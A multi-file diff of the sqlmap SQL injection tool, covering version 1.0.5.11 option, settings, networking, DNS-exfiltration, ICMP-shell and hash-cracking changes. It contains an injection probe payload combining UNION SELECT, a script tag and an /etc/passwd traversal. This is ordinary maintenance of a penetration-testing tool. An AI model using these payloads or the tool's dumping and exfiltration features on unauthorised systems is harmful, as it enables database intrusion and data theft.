|
||||
_setKnowledgeBaseAttributes()
|
||||
_mergeOptions(inputOptions, overrideOptions)
|
||||
|
|
|
@ -136,6 +136,7 @@ optDict = {
|
|||
"tbl": "string",
|
||||
"col": "string",
|
||||
"excludeCol": "string",
|
||||
"pivotColumn": "string",
|
||||
"dumpWhere": "string",
|
||||
"user": "string",
|
||||
"excludeSysDbs": "boolean",
|
||||
|
@ -189,6 +190,7 @@ optDict = {
|
|||
#"xmlFile": "string",
|
||||
"trafficFile": "string",
|
||||
"batch": "boolean",
|
||||
"binaryFields": "string",
|
||||
"charset": "string",
|
||||
"crawlDepth": "integer",
|
||||
"crawlExclude": "string",
|
||||
|
@ -201,7 +203,6 @@ optDict = {
|
|||
"hexConvert": "boolean",
|
||||
"outputDir": "string",
|
||||
"parseErrors": "boolean",
|
||||
"pivotColumn": "string",
|
||||
"saveConfig": "string",
|
||||
"scope": "string",
|
||||
"testFilter": "string",
|
||||
|
@ -228,9 +229,7 @@ optDict = {
|
|||
"Hidden": {
|
||||
"dummy": "boolean",
|
||||
"disablePrecon": "boolean",
|
||||
"binaryFields": "string",
|
||||
"profile": "boolean",
|
||||
"cpuThrottle": "integer",
|
||||
"forceDns": "boolean",
|
||||
"identifyWaf": "boolean",
|
||||
"skipWaf": "boolean",
|
||||
|
|
|
@ -26,7 +26,7 @@ def setDbms(dbms):
|
|||
hashDBWrite(HASHDB_KEYS.DBMS, dbms)
|
||||
|
||||
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
|
||||
_ = re.search("^%s" % _, dbms, re.I)
|
||||
_ = re.search(r"\A%s( |\Z)" % _, dbms, re.I)
|
||||
|
||||
if _:
|
||||
dbms = _.group(1)
|
||||
|
|
|
@ -10,7 +10,6 @@ import re
|
|||
import subprocess
|
||||
import string
|
||||
import sys
|
||||
import time
|
||||
import types
|
||||
|
||||
from lib.core.datatype import AttribDict
|
||||
|
@ -19,8 +18,8 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
|
|||
from lib.core.enums import OS
|
||||
from lib.core.revision import getRevisionNumber
|
||||
|
||||
# sqlmap version and site
|
||||
VERSION = "1.0.0.8"
|
||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||
VERSION = "1.0.5.11"
|
||||
REVISION = getRevisionNumber()
|
||||
STABLE = VERSION.count('.') <= 2
|
||||
VERSION_STRING = "sqlmap/%s#%s" % (VERSION, "stable" if STABLE else "dev")
|
||||
|
@ -61,6 +60,7 @@ PARTIAL_HEX_VALUE_MARKER = "__PARTIAL_HEX_VALUE__"
|
|||
URI_QUESTION_MARKER = "__QUESTION_MARK__"
|
||||
ASTERISK_MARKER = "__ASTERISK_MARK__"
|
||||
REPLACEMENT_MARKER = "__REPLACEMENT_MARK__"
|
||||
BOUNDED_INJECTION_MARKER = "__BOUNDED_INJECTION_MARK__"
|
||||
|
||||
RANDOM_INTEGER_MARKER = "[RANDINT]"
|
||||
RANDOM_STRING_MARKER = "[RANDSTR]"
|
||||
|
@ -139,6 +139,9 @@ MAX_BUFFERED_PARTIAL_UNION_LENGTH = 1024
|
|||
# Suffix used for naming meta databases in DBMS(es) without explicit database name
|
||||
METADB_SUFFIX = "_masterdb"
|
||||
|
||||
# Number of times to retry the pushValue during the exceptions (e.g. KeyboardInterrupt)
|
||||
PUSH_VALUE_EXCEPTION_RETRY_COUNT = 3
|
||||
|
||||
# Minimum time response set needed for time-comparison based on standard deviation
|
||||
MIN_TIME_RESPONSES = 30
|
||||
|
||||
|
@ -310,9 +313,6 @@ BURP_REQUEST_REGEX = r"={10,}\s+[^=]+={10,}\s(.+?)\s={10,}"
|
|||
# Regex used for parsing XML Burp saved history items
|
||||
BURP_XML_HISTORY_REGEX = r'<port>(\d+)</port>.+?<request base64="true"><!\[CDATA\[([^]]+)'
|
||||
|
||||
# Server header in CloudFlare responses
|
||||
CLOUDFLARE_SERVER_HEADER = "cloudflare-nginx"
|
||||
|
||||
# Encoding used for Unicode data
|
||||
UNICODE_ENCODING = "utf8"
|
||||
|
||||
|
@ -445,7 +445,7 @@ DUMMY_SQL_INJECTION_CHARS = ";()'"
|
|||
DUMMY_USER_INJECTION = r"(?i)[^\w](AND|OR)\s+[^\s]+[=><]|\bUNION\b.+\bSELECT\b|\bSELECT\b.+\bFROM\b|\b(CONCAT|information_schema|SLEEP|DELAY)\b"
|
||||
|
||||
# Extensions skipped by crawler
|
||||
CRAWL_EXCLUDE_EXTENSIONS = ("gif", "jpg", "jpeg", "image", "jar", "tif", "bmp", "war", "ear", "mpg", "mpeg", "wmv", "mpeg", "scm", "iso", "dmp", "dll", "cab", "so", "avi", "mkv", "bin", "iso", "tar", "png", "pdf", "ps", "wav", "mp3", "mp4", "au", "aiff", "aac", "zip", "rar", "7z", "gz", "flv", "mov", "doc", "docx", "xls", "dot", "dotx", "xlt", "xlsx", "ppt", "pps", "pptx")
|
||||
CRAWL_EXCLUDE_EXTENSIONS = ('3ds', '3g2', '3gp', '7z', 'DS_Store', 'a', 'aac', 'adp', 'ai', 'aif', 'aiff', 'apk', 'ar', 'asf', 'au', 'avi', 'bak', 'bin', 'bk', 'bmp', 'btif', 'bz2', 'cab', 'caf', 'cgm', 'cmx', 'cpio', 'cr2', 'dat', 'deb', 'djvu', 'dll', 'dmg', 'dmp', 'dng', 'doc', 'docx', 'dot', 'dotx', 'dra', 'dsk', 'dts', 'dtshd', 'dvb', 'dwg', 'dxf', 'ear', 'ecelp4800', 'ecelp7470', 'ecelp9600', 'egg', 'eol', 'eot', 'epub', 'exe', 'f4v', 'fbs', 'fh', 'fla', 'flac', 'fli', 'flv', 'fpx', 'fst', 'fvt', 'g3', 'gif', 'gz', 'h261', 'h263', 'h264', 'ico', 'ief', 'image', 'img', 'ipa', 'iso', 'jar', 'jpeg', 'jpg', 'jpgv', 'jpm', 'jxr', 'ktx', 'lvp', 'lz', 'lzma', 'lzo', 'm3u', 'm4a', 'm4v', 'mar', 'mdi', 'mid', 'mj2', 'mka', 'mkv', 'mmr', 'mng', 'mov', 'movie', 'mp3', 'mp4', 'mp4a', 'mpeg', 'mpg', 'mpga', 'mxu', 'nef', 'npx', 'o', 'oga', 'ogg', 'ogv', 'otf', 'pbm', 'pcx', 'pdf', 'pea', 'pgm', 'pic', 'png', 'pnm', 'ppm', 'pps', 'ppt', 'pptx', 'ps', 'psd', 'pya', 'pyc', 'pyo', 'pyv', 'qt', 'rar', 'ras', 'raw', 'rgb', 'rip', 'rlc', 'rz', 's3m', 's7z', 'scm', 'scpt', 'sgi', 'shar', 'sil', 'smv', 'so', 'sub', 'swf', 'tar', 'tbz2', 'tga', 'tgz', 'tif', 'tiff', 'tlz', 'ts', 'ttf', 'uvh', 'uvi', 'uvm', 'uvp', 'uvs', 'uvu', 'viv', 'vob', 'war', 'wav', 'wax', 'wbmp', 'wdp', 'weba', 'webm', 'webp', 'whl', 'wm', 'wma', 'wmv', 'wmx', 'woff', 'woff2', 'wvx', 'xbm', 'xif', 'xls', 'xlsx', 'xlt', 'xm', 'xpi', 'xpm', 'xwd', 'xz', 'z', 'zip', 'zipx')
|
||||
|
||||
# Patterns often seen in HTTP headers containing custom injection marking character
|
||||
PROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r"(;q=[^;']+)|(\*/\*)"
|
||||
|
@ -457,7 +457,7 @@ BRUTE_TABLE_EXISTS_TEMPLATE = "EXISTS(SELECT %d FROM %s)"
|
|||
BRUTE_COLUMN_EXISTS_TEMPLATE = "EXISTS(SELECT %s FROM %s)"
|
||||
|
||||
# Payload used for checking of existence of IDS/WAF (dummier the better)
|
||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,3,table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
|
||||
IDS_WAF_CHECK_PAYLOAD = "AND 1=1 UNION ALL SELECT 1,2,'<script>',table_name FROM information_schema.tables WHERE 2>1-- ../../../etc/passwd"
|
||||
|
||||
# Data inside shellcodeexec to be filled with random string
|
||||
SHELLCODEEXEC_RANDOM_STRING_MARKER = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
|
||||
|
@ -483,6 +483,10 @@ SOCKET_PRE_CONNECT_QUEUE_SIZE = 3
|
|||
# Only console display last n table rows
|
||||
TRIM_STDOUT_DUMP_SIZE = 256
|
||||
|
||||
# Reference: http://stackoverflow.com/a/3168436
|
||||
# Reference: https://support.microsoft.com/en-us/kb/899149
|
||||
DUMP_FILE_BUFFER_SIZE = 1024
|
||||
|
||||
# Parse response headers only first couple of times
|
||||
PARSE_HEADERS_LIMIT = 3
|
||||
|
||||
|
@ -526,7 +530,7 @@ HASHDB_FLUSH_RETRIES = 3
|
|||
HASHDB_END_TRANSACTION_RETRIES = 3
|
||||
|
||||
# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)
|
||||
HASHDB_MILESTONE_VALUE = "JHjrBugdDA" # "".join(random.sample(string.ascii_letters, 10))
|
||||
HASHDB_MILESTONE_VALUE = "WVMqopmuzX" # "".join(random.sample(string.ascii_letters, 10))
|
||||
|
||||
# Warn user of possible delay due to large page dump in full UNION query injections
|
||||
LARGE_OUTPUT_THRESHOLD = 1024 ** 2
|
||||
|
@ -571,7 +575,7 @@ MAX_BISECTION_LENGTH = 50 * 1024 * 1024
|
|||
LARGE_CHUNK_TRIM_MARKER = "__TRIMMED_CONTENT__"
|
||||
|
||||
# Generic SQL comment formation
|
||||
GENERIC_SQL_COMMENT = "-- -"
|
||||
GENERIC_SQL_COMMENT = "-- [RANDSTR]"
|
||||
|
||||
# Threshold value for turning back on time auto-adjustment mechanism
|
||||
VALID_TIME_CHARS_RUN_THRESHOLD = 100
|
||||
|
@ -592,7 +596,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
|||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
|
|
|
@ -451,7 +451,7 @@ def _resumeDBMS():
|
|||
dbms = value.lower()
|
||||
dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
||||
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
|
||||
_ = re.search("%s ([\d\.]+)" % _, dbms, re.I)
|
||||
_ = re.search(r"\A%s (.*)" % _, dbms, re.I)
|
||||
|
||||
if _:
|
||||
dbms = _.group(1).lower()
|
||||
|
|
|
@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
|
|||
"""
|
||||
|
||||
import difflib
|
||||
import random
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
|
@ -51,6 +52,7 @@ class _ThreadData(threading.local):
|
|||
self.lastRequestMsg = None
|
||||
self.lastRequestUID = 0
|
||||
self.lastRedirectURL = None
|
||||
self.random = random.WichmannHill()
|
||||
self.resumed = False
|
||||
self.retriesCount = 0
|
||||
self.seqMatcher = difflib.SequenceMatcher(None)
|
||||
|
@ -200,7 +202,10 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
|||
|
||||
for lock in kb.locks.values():
|
||||
if lock.locked_lock():
|
||||
lock.release()
|
||||
try:
|
||||
lock.release()
|
||||
except thread.error:
|
||||
pass
|
||||
|
||||
if conf.get("hashDB"):
|
||||
conf.hashDB.flush(True)
|
||||
|
|
|
@ -5,6 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import locale
|
||||
import os
|
||||
import re
|
||||
import time
|
||||
|
@ -43,7 +44,7 @@ def update():
|
|||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
||||
|
||||
try:
|
||||
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH)
|
||||
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
|
||||
pollProcess(process, True)
|
||||
stdout, stderr = process.communicate()
|
||||
success = not process.returncode
|
||||
|
|
|
@ -11,7 +11,6 @@ import zipfile
|
|||
from lib.core.common import getSafeExString
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
class Wordlist(object):
|
||||
"""
|
||||
|
|
|
@ -464,6 +464,9 @@ def cmdLineParser(argv=None):
|
|||
help="Exclude DBMS system databases when "
|
||||
"enumerating tables")
|
||||
|
||||
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
||||
help="Pivot column name")
|
||||
|
||||
enumeration.add_option("--where", dest="dumpWhere",
|
||||
help="Use WHERE condition while table dumping")
|
||||
|
||||
|
@ -617,6 +620,9 @@ def cmdLineParser(argv=None):
|
|||
action="store_true",
|
||||
help="Never ask for user input, use the default behaviour")
|
||||
|
||||
general.add_option("--binary-fields", dest="binaryFields",
|
||||
help="Result fields having binary values (e.g. \"digest\")")
|
||||
|
||||
general.add_option("--charset", dest="charset",
|
||||
help="Force character encoding used for data retrieval")
|
||||
|
||||
|
@ -662,9 +668,6 @@ def cmdLineParser(argv=None):
|
|||
action="store_true",
|
||||
help="Parse and display DBMS error messages from responses")
|
||||
|
||||
general.add_option("--pivot-column", dest="pivotColumn",
|
||||
help="Pivot column name")
|
||||
|
||||
general.add_option("--save", dest="saveConfig",
|
||||
help="Save options to a configuration INI file")
|
||||
|
||||
|
@ -760,12 +763,6 @@ def cmdLineParser(argv=None):
|
|||
parser.add_option("--profile", dest="profile", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--binary-fields", dest="binaryFields",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
|
|
|
@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
|
|||
ContentHandler.__init__(self)
|
||||
|
||||
self._dbms = None
|
||||
self._page = page
|
||||
self._page = (page or "")
|
||||
self._lower_page = self._page.lower()
|
||||
|
||||
self.dbms = None
|
||||
|
||||
|
@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
|
|||
threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
|
||||
|
||||
def startElement(self, name, attrs):
|
||||
if self.dbms:
|
||||
return
|
||||
|
||||
if name == "dbms":
|
||||
self._dbms = attrs.get("value")
|
||||
|
||||
elif name == "error":
|
||||
if re.search(attrs.get("regexp"), self._page, re.I):
|
||||
regexp = attrs.get("regexp")
|
||||
if regexp not in kb.cache.regex:
|
||||
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
|
||||
keywords = sorted(keywords, key=len)
|
||||
kb.cache.regex[regexp] = keywords[-1].lower()
|
||||
|
||||
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
|
||||
self.dbms = self._dbms
|
||||
self._markAsErrorPage()
|
||||
|
||||
|
|
|
@ -150,7 +150,7 @@ def checkCharEncoding(encoding, warn=True):
|
|||
return encoding
|
||||
|
||||
# Reference: http://www.destructor.de/charsets/index.htm
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
|
||||
for delimiter in (';', ',', '('):
|
||||
if delimiter in encoding:
|
||||
|
@ -204,7 +204,7 @@ def checkCharEncoding(encoding, warn=True):
|
|||
# Reference: http://docs.python.org/library/codecs.html
|
||||
try:
|
||||
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
||||
except LookupError:
|
||||
except (LookupError, ValueError):
|
||||
if warn:
|
||||
warnMsg = "unknown web page charset '%s'. " % encoding
|
||||
warnMsg += "Please report by e-mail to 'dev@sqlmap.org'"
|
||||
|
|
|
@ -32,7 +32,6 @@ from lib.core.agent import agent
|
|||
from lib.core.common import asciifyUrl
|
||||
from lib.core.common import calculateDeltaSeconds
|
||||
from lib.core.common import clearConsoleLine
|
||||
from lib.core.common import cpuThrottle
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import evaluateCode
|
||||
from lib.core.common import extractRegexResult
|
||||
|
@ -220,8 +219,6 @@ class Connect(object):
|
|||
|
||||
if isinstance(conf.delay, (int, float)) and conf.delay > 0:
|
||||
time.sleep(conf.delay)
|
||||
elif conf.cpuThrottle:
|
||||
cpuThrottle(conf.cpuThrottle)
|
||||
|
||||
if conf.offline:
|
||||
return None, None, None
|
||||
|
@ -391,9 +388,10 @@ class Connect(object):
|
|||
|
||||
for key, value in headers.items():
|
||||
del headers[key]
|
||||
headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(value, kb.pageEncoding)
|
||||
value = unicodeencode(value, kb.pageEncoding)
|
||||
for char in (r"\r", r"\n"):
|
||||
value = re.sub(r"(%s)([^ \t])" % char, r"\g<1>\t\g<2>", value)
|
||||
headers[unicodeencode(key, kb.pageEncoding)] = value.strip("\r\n")
|
||||
|
||||
url = unicodeencode(url)
|
||||
post = unicodeencode(post)
|
||||
|
@ -615,8 +613,12 @@ class Connect(object):
|
|||
elif "forcibly closed" in tbMsg or "Connection is already closed" in tbMsg:
|
||||
warnMsg = "connection was forcibly closed by the target URL"
|
||||
elif "timed out" in tbMsg:
|
||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
||||
conf.disablePrecon = True
|
||||
if not conf.disablePrecon:
|
||||
singleTimeWarnMessage("turning off pre-connect mechanism because of connection time out(s)")
|
||||
conf.disablePrecon = True
|
||||
|
||||
if kb.testMode and kb.testType not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
kb.responseTimes.clear()
|
||||
|
||||
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF) is dropping 'suspicious' requests")
|
||||
|
|
|
@ -6,6 +6,8 @@ See the file 'doc/COPYING' for copying permission
|
|||
"""
|
||||
|
||||
import os
|
||||
import re
|
||||
import socket
|
||||
import time
|
||||
|
||||
from extra.icmpsh.icmpsh_m import main as icmpshmaster
|
||||
|
@ -54,15 +56,29 @@ class ICMPsh:
|
|||
if self.localIP:
|
||||
message += "[Enter for '%s' (detected)] " % self.localIP
|
||||
|
||||
while not address:
|
||||
address = readInput(message, default=self.localIP)
|
||||
valid = None
|
||||
while not valid:
|
||||
valid = True
|
||||
address = readInput(message, default=self.localIP or "")
|
||||
|
||||
try:
|
||||
socket.inet_aton(address)
|
||||
except socket.error:
|
||||
valid = False
|
||||
finally:
|
||||
valid = valid and re.search(r"\d+\.\d+\.\d+\.\d+", address) is not None
|
||||
|
||||
if conf.batch and not address:
|
||||
raise SqlmapDataException("local host address is missing")
|
||||
elif address and not valid:
|
||||
warnMsg = "invalid local host address"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
return address
|
||||
|
||||
def _prepareIngredients(self, encode=True):
|
||||
self.localIP = getattr(self, "localIP", None)
|
||||
self.remoteIP = getattr(self, "remoteIP", None)
|
||||
self.lhostStr = ICMPsh._selectLhost(self)
|
||||
self.rhostStr = ICMPsh._selectRhost(self)
|
||||
|
||||
|
|
|
@ -5,11 +5,9 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
import threading
|
||||
import time
|
||||
|
||||
from extra.safe2bin.safe2bin import safechardecode
|
||||
from extra.safe2bin.safe2bin import safecharencode
|
||||
from lib.core.agent import agent
|
||||
from lib.core.common import Backend
|
||||
|
@ -20,13 +18,11 @@ from lib.core.common import decodeIntToUnicode
|
|||
from lib.core.common import filterControlChars
|
||||
from lib.core.common import getCharset
|
||||
from lib.core.common import getCounter
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import goGoodSamaritan
|
||||
from lib.core.common import getPartRun
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import incrementCounter
|
||||
from lib.core.common import randomInt
|
||||
from lib.core.common import safeStringFormat
|
||||
from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.data import conf
|
||||
|
@ -44,7 +40,6 @@ from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
|||
from lib.core.settings import INFERENCE_GREATER_CHAR
|
||||
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
||||
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
||||
from lib.core.settings import MIN_TIME_RESPONSES
|
||||
from lib.core.settings import MAX_BISECTION_LENGTH
|
||||
from lib.core.settings import MAX_TIME_REVALIDATION_STEPS
|
||||
from lib.core.settings import NULL
|
||||
|
|
|
@ -61,6 +61,10 @@ def dnsUse(payload, expression):
|
|||
chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL) else MAX_DNS_LABEL / 4 - 2
|
||||
_, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
|
||||
nulledCastedField = agent.nullAndCastField(fieldToCastStr)
|
||||
extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(fieldToCastStr), expression).group(0)
|
||||
if extendedField != fieldToCastStr: # e.g. MIN(surname)
|
||||
nulledCastedField = extendedField.replace(fieldToCastStr, nulledCastedField)
|
||||
fieldToCastStr = extendedField
|
||||
nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length)
|
||||
nulledCastedField = agent.hexConvertField(nulledCastedField)
|
||||
expressionReplaced = expression.replace(fieldToCastStr, nulledCastedField, 1)
|
||||
|
|
|
@ -30,6 +30,7 @@ import os
|
|||
import re
|
||||
import tempfile
|
||||
import time
|
||||
import zipfile
|
||||
|
||||
from hashlib import md5
|
||||
from hashlib import sha1
|
||||
|
@ -45,6 +46,7 @@ from lib.core.common import dataToStdout
|
|||
from lib.core.common import getFileItems
|
||||
from lib.core.common import getPublicTypeMembers
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.common import hashDBRetrieve
|
||||
from lib.core.common import hashDBWrite
|
||||
from lib.core.common import normalizeUnicode
|
||||
|
@ -60,6 +62,7 @@ from lib.core.data import kb
|
|||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import HASH
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import COMMON_PASSWORD_SUFFIXES
|
||||
from lib.core.settings import COMMON_USER_COLUMNS
|
||||
|
@ -490,7 +493,7 @@ def attackDumpedTable():
|
|||
|
||||
for (_, hash_, password) in results:
|
||||
if hash_:
|
||||
lut[hash_.lower()] = password
|
||||
lut[hash_.lower()] = getUnicode(password)
|
||||
|
||||
infoMsg = "postprocessing table dump"
|
||||
logger.info(infoMsg)
|
||||
|
@ -785,6 +788,14 @@ def dictionaryAttack(attack_dict):
|
|||
for dictPath in dictPaths:
|
||||
checkFile(dictPath)
|
||||
|
||||
if os.path.splitext(dictPath)[1].lower() == ".zip":
|
||||
_ = zipfile.ZipFile(dictPath, 'r')
|
||||
if len(_.namelist()) == 0:
|
||||
errMsg = "no file(s) inside '%s'" % dictPath
|
||||
raise SqlmapDataException(errMsg)
|
||||
else:
|
||||
_.open(_.namelist()[0])
|
||||
|
||||
kb.wordlists = dictPaths
|
||||
|
||||
except Exception, ex:
|
||||
|
|
|
@ -66,7 +66,7 @@ class HashDB(object):
|
|||
@staticmethod
|
||||
def hashKey(key):
|
||||
key = key.encode(UNICODE_ENCODING) if isinstance(key, unicode) else repr(key)
|
||||
retVal = int(hashlib.md5(key).hexdigest()[:12], 16)
|
||||
retVal = int(hashlib.md5(key).hexdigest(), 16) & 0x7fffffffffffffff # Reference: http://stackoverflow.com/a/4448400
|
||||
return retVal
|
||||
|
||||
def retrieve(self, key, unserialize=False):
|
||||
|
@ -97,6 +97,7 @@ class HashDB(object):
|
|||
try:
|
||||
retVal = unserializeObject(retVal)
|
||||
except:
|
||||
retVal = None
|
||||
warnMsg = "error occurred while unserializing value for session key '%s'. " % key
|
||||
warnMsg += "If the problem persists please rerun with `--flush-session`"
|
||||
logger.warn(warnMsg)
|
||||
|
|
|
@ -5,7 +5,6 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
|||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import cookielib
|
||||
import httplib
|
||||
import re
|
||||
import socket
|
||||
|
@ -26,7 +25,6 @@ from lib.core.enums import HTTP_HEADER
|
|||
from lib.core.enums import REDIRECTION
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapGenericException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import DUMMY_SEARCH_USER_AGENT
|
||||
from lib.core.settings import DUCKDUCKGO_REGEX
|
||||
|
@ -35,7 +33,6 @@ from lib.core.settings import GOOGLE_REGEX
|
|||
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.request.basic import decodePage
|
||||
from lib.request.httpshandler import HTTPSHandler
|
||||
from thirdparty.socks import socks
|
||||
|
||||
|
||||
|
|
|
@ -572,7 +572,11 @@ class Databases:
|
|||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(name.upper()))
|
||||
else:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(name))
|
||||
|
||||
comment = unArrayizeValue(inject.getValue(query, blind=False, time=False))
|
||||
if not isNoneValue(comment):
|
||||
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, name)
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "possible to get column comments"
|
||||
|
@ -702,7 +706,11 @@ class Databases:
|
|||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db.upper()), unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(column.upper()))
|
||||
else:
|
||||
query = _.query % (unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column))
|
||||
|
||||
comment = unArrayizeValue(inject.getValue(query, union=False, error=False))
|
||||
if not isNoneValue(comment):
|
||||
infoMsg = "retrieved comment '%s' for column '%s'" % (comment, column)
|
||||
logger.info(infoMsg)
|
||||
else:
|
||||
warnMsg = "on %s it is not " % Backend.getIdentifiedDbms()
|
||||
warnMsg += "possible to get column comments"
|
||||
|
|
|
@ -169,7 +169,14 @@ class Entries:
|
|||
if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, blind=False)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
warnMsg = "Ctrl+C detected in dumping phase"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if retVal:
|
||||
entries, _ = retVal
|
||||
|
@ -269,7 +276,14 @@ class Entries:
|
|||
elif Backend.isDbms(DBMS.MAXDB):
|
||||
table = "%s.%s" % (conf.db, tbl)
|
||||
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
try:
|
||||
retVal = pivotDumpTable(table, colList, count, blind=True)
|
||||
except KeyboardInterrupt:
|
||||
retVal = None
|
||||
kb.dumpKeyboardInterrupt = True
|
||||
clearConsoleLine()
|
||||
